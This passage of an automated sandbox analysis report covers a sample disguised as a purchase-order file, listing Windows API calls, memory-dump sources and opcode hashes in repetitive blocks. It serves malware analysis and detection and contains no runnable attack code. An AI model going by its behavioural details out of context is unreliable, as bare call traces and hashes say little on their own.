                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                                                                                                      • Opcode ID: 1940121c75fedefb23b30f275eb602f4dfb1250f04432a587cdad5aad61bf5be
                                                                                                                                                                                                      • Instruction ID: 66b3d4fb4e9643f34041b919343489f51d7d56158e1018fa912c4bcc0f6ac78b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1940121c75fedefb23b30f275eb602f4dfb1250f04432a587cdad5aad61bf5be
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48216B71600205ABFB219F25DC05A9FBBB8AF45724F204A2EF8A1D72D0D774DD41EB28
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00449653
                                                                                                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00449683
                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00449694
                                                                                                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 004496CE
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                                                                                                      • String ID: nul
                                                                                                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                                                                                                      • Opcode ID: 9c66512d6f95fcdfbabbbcbe61e1abb9c78875304d1df792b0257b063aef83bf
                                                                                                                                                                                                      • Instruction ID: 90b4d87eb029effa5109f35d439d52d9dc698f60e9680a3d94063f085d7b045b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c66512d6f95fcdfbabbbcbe61e1abb9c78875304d1df792b0257b063aef83bf
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7721A1719002059BEB209F698C44E9FB7E8AF95734F200A1AF8A1D33D0D7749C41DB18
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0043C82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0043C84A
                                                                                                                                                                                                        • Part of subcall function 0043C82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043C85D
                                                                                                                                                                                                        • Part of subcall function 0043C82D: GetCurrentThreadId.KERNEL32 ref: 0043C864
                                                                                                                                                                                                        • Part of subcall function 0043C82D: AttachThreadInput.USER32(00000000), ref: 0043C86B
                                                                                                                                                                                                      • GetFocus.USER32 ref: 0043CA05
                                                                                                                                                                                                        • Part of subcall function 0043C876: GetParent.USER32(?), ref: 0043C884
                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 0043CA4E
                                                                                                                                                                                                      • EnumChildWindows.USER32(?,0043CAC4), ref: 0043CA76
                                                                                                                                                                                                      • __swprintf.LIBCMT ref: 0043CA90
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                                                      • API String ID: 3187004680-1110647743
                                                                                                                                                                                                      • Opcode ID: 27703f750c254b8df19cde0fe7a16eb874166500f6a25c600e85877b7e532df2
                                                                                                                                                                                                      • Instruction ID: 829f495f47ef218ad7d12fc0482335a0f9b2c0f30f702a8be16dcec9d61f0c8a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27703f750c254b8df19cde0fe7a16eb874166500f6a25c600e85877b7e532df2
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8A1172716002096BCF15BF619CC5FAA3778AF49718F00907BFA09BA182DB789645DB78
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0046E33D
                                                                                                                                                                                                      • _memset.LIBCMT ref: 0046E34C
                                                                                                                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C3D00,004C3D44), ref: 0046E37B
                                                                                                                                                                                                      • CloseHandle.KERNEL32 ref: 0046E38D
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                                                                      • String ID: D=L
                                                                                                                                                                                                      • API String ID: 3277943733-2639313163
                                                                                                                                                                                                      • Opcode ID: 9cdb3eb17ab4b92b591a418dd0827165d4bfee49c7ed39e47b44089da6596004
                                                                                                                                                                                                      • Instruction ID: 1dc04ddbbd56b6e1bfcd3b76fe9272b6450bf468c53a2e9cb482092a9c0dbf5b
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cdb3eb17ab4b92b591a418dd0827165d4bfee49c7ed39e47b44089da6596004
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 20F0BEF0601310BAE2502F61BC05FBB3EACDB04756F008436BE0AD61A2D3799E0087AC
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AF3F73,00000003,?,00AF3F13,00000003,00B0DE80,0000000C,00AF403D,00000003,00000002), ref: 00AF3FE2
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AF3FF5
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,00AF3F73,00000003,?,00AF3F13,00000003,00B0DE80,0000000C,00AF403D,00000003,00000002,00000000), ref: 00AF4018
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2072069896.0000000000AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ab0000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                      • Opcode ID: 9decd1c7ade07b9eb1cd3cd367ea2500da613c503eca37fb4201eae2b76f1c95
                                                                                                                                                                                                      • Instruction ID: 98b6cdf224ed50524682a1b6924ffe81edaa0aae9f0a168e811ec70cf4f6290c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9decd1c7ade07b9eb1cd3cd367ea2500da613c503eca37fb4201eae2b76f1c95
                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBF04F70A4021CBBCB119FD4DC09BFEBFB9EB48751F0001A4F90AA21A0DFB49A45CA95
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004619F3
                                                                                                                                                                                                      • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00461A26
                                                                                                                                                                                                      • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00461B49
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00461BBF
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2364364464-0
                                                                                                                                                                                                      • Opcode ID: 9282f24e6ff8530c23ddd74a7ce06cdb5885e117eb99833be6355047d1ea841d
                                                                                                                                                                                                      • Instruction ID: 2bdb186c9e029468b938e76092bf29530639fde0365ee340ce212a0d3725281c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9282f24e6ff8530c23ddd74a7ce06cdb5885e117eb99833be6355047d1ea841d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94816570600204ABDF10DF65C886BAEBBE5AF04714F18845EF905AF3D2E7B8A941CB95
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0046E1D5
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0046E20D
                                                                                                                                                                                                      • IsDlgButtonChecked.USER32(?,00000001), ref: 0046E248
                                                                                                                                                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0046E269
                                                                                                                                                                                                      • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0046E281
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessageSend$ButtonCheckedLongWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3188977179-0
                                                                                                                                                                                                      • Opcode ID: 013adbfa369c8983b8cd62041ff00c2aa11dd50f530f7c8b5fe76d3ced3d0aa1
                                                                                                                                                                                                      • Instruction ID: bdb366902d71711e492ed88324e390aca6fd6c32f1e052b1125fce0f7f40200c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 013adbfa369c8983b8cd62041ff00c2aa11dd50f530f7c8b5fe76d3ced3d0aa1
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07619438A00204AFDB20CF56C854FEB77FAAB4A300F14405BF955973A1D779A951DB1A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 004606EE
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 0046077D
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,00000000), ref: 0046079B
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,?), ref: 004607E1
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000004), ref: 004607FB
                                                                                                                                                                                                        • Part of subcall function 0041E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0044A574,?,?,00000000,00000008), ref: 0041E675
                                                                                                                                                                                                        • Part of subcall function 0041E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0044A574,?,?,00000000,00000008), ref: 0041E699
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 327935632-0
                                                                                                                                                                                                      • Opcode ID: 7e974794b9ebcf7644e118669091014843e614acbdd884541301673f92c5cb14
                                                                                                                                                                                                      • Instruction ID: 87febcb3e1d6037208c0937028248e6385403b15d7085c17ee78e3048b04f42a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e974794b9ebcf7644e118669091014843e614acbdd884541301673f92c5cb14
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F1516E75A00205DFCB04EFA9C485DAEB7B5BF18314B04806AE905AB391EB38ED45CF89
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00463C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00462BB5,?,?), ref: 00463C1D
                                                                                                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00462EEF
                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00462F2E
                                                                                                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00462F75
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?), ref: 00462FA1
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00462FAE
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3740051246-0
                                                                                                                                                                                                      • Opcode ID: 4d18af4e82d6d0b7a8eee85a3ae716d0fa40a678c36dbf43d598d0e030d7a270
                                                                                                                                                                                                      • Instruction ID: f2e41662885f165f18e384d2a40cd3da89a2193350d58dfc2c6ca3ce7a760dd9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d18af4e82d6d0b7a8eee85a3ae716d0fa40a678c36dbf43d598d0e030d7a270
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 48518B71608204AFD704EF64C981E6BB7F8FF88308F00492EF59597291EB78E905DB5A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: a7ec6fe09be3078d1c893fdcf3f2ff488aa178df2834385e2e392a1983d3a020
                                                                                                                                                                                                      • Instruction ID: 09529bc7e3110235e9e6e45ecf7d8fa4ad648c899c66dbd7154b48755ec01ae1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7ec6fe09be3078d1c893fdcf3f2ff488aa178df2834385e2e392a1983d3a020
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA41B339E01104ABD714DF68CC84FBABB74EB09310F140236E999A72E1E739AD11969A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 004512B4
                                                                                                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 004512DD
                                                                                                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0045131C
                                                                                                                                                                                                        • Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
                                                                                                                                                                                                        • Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF
                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00451341
                                                                                                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00451349
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1389676194-0
                                                                                                                                                                                                      • Opcode ID: 745e8af2c8a30260d11a2f139f3fe93f5d4de3b0e529c75e1797880a93a2b48e
                                                                                                                                                                                                      • Instruction ID: 710539193e7f1d8fb549b37adceebc83b926d8c979f1569505f486b0f8da61be
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 745e8af2c8a30260d11a2f139f3fe93f5d4de3b0e529c75e1797880a93a2b48e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F414C35A00105DFDB01EF65C981AAEBBF5FF08314B1480AAE946AB3A2DB35ED01DF54
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetCursorPos.USER32(000000FF), ref: 0041B64F
                                                                                                                                                                                                      • ScreenToClient.USER32(00000000,000000FF), ref: 0041B66C
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000001), ref: 0041B691
                                                                                                                                                                                                      • GetAsyncKeyState.USER32(00000002), ref: 0041B69F
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071214541.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071351072.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071434742.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071475648.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071582546.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000000.00000002.2071629301.000000000053C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_PO #09465610_GQ 003745_SO-242000846.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 4210589936-0
                                                                                                                                                                                                      • Opcode ID: 43b026e8ddf3c15877f3b5ba52f636104edfffe8d0463ba332f451902e7bfc12
                                                                                                                                                                                                      • Instruction ID: 56377a556ccba115ed564bfe001a2c8afbd6a1a20169098259664232e43cb080
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 43b026e8ddf3c15877f3b5ba52f636104edfffe8d0463ba332f451902e7bfc12
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3A417E31A04119BBCF159F65C844AEEBB74FF15324F10831BF82996290C739AD90DB9A
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 0043B369
                                                                                                                                                                                                      • PostMessageW.USER32(?,00000201,00000001), ref: 0043B413
                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 0043B41B
                                                                                                                                                                                                      • PostMessageW.USER32(?,00000202,00000000), ref: 0043B429
                                                                                                                                                                                                      • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 0043B431
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.2071253412.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
